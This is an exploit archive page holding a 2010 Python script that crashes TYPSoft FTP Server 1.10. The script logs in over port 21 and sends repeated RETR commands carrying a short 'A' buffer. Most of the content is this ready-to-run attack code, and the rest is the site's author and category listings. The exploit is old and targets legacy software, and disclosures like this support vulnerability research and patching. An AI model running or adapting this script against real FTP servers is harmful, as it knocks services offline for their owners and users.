TYPSoft 1.0 RETR Denial Of Service

TYPSoft 1.0 RETR Denial Of Service: Posted May 14, 2010; Authored by Jeremiah Talamantes; TYPSoft version 1.0 RETR command denial of service exploit.; tags | exploit, denial of service; SHA-256 | 9e743870310a319983612a510077f27e93555ce348bf5017ef067515f6ee954b; Download | Favorite | View

TYPSoft 1.0 RETR Denial Of Service

# Exploit Title: TYPSoft FTP Server 1.10 RETR Command DoS
# Date: 5/13/2010
# Author: Jeremiah Talamantes (RedTeam Security)
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows XP, SP2 (EN)

# DESCRIPTION:
# This script exploits a weakness in the RETR command in TYPSoft v1.10
# It requires only a small buffer that is executed in succession within
# the same socket connection. 

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##         TYPSoft FTP Server v1.10 RETR Command DoS           ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Define the exploit's usage
def Usage():
    print ("Usage:  scriptname.py <IP address> <username> <password>\n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security : www.redteamsecure.com/labs\n")

# Buffer settings
# This works with a relatively small buffer
buffer= "A" * 30

def start(hostname, username, password):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Error: unable to connect to host")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    #Send username to server
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    # Send password to server
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    print "Sending the malicious chars..."
    # Send data to server
    sock.send("RETR %s\r\n" %buffer)
  
  # Repeat to overflow
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    sock.send("RETR %s\r\n" %buffer)
    sock.close()
  
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    start(hostname,username,password)
    sys.exit(0)

# end

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

TYPSoft 1.0 RETR Denial Of Service

TYPSoft 1.0 RETR Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

TYPSoft 1.0 RETR Denial Of Service

Share This

TYPSoft 1.0 RETR Denial Of Service

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems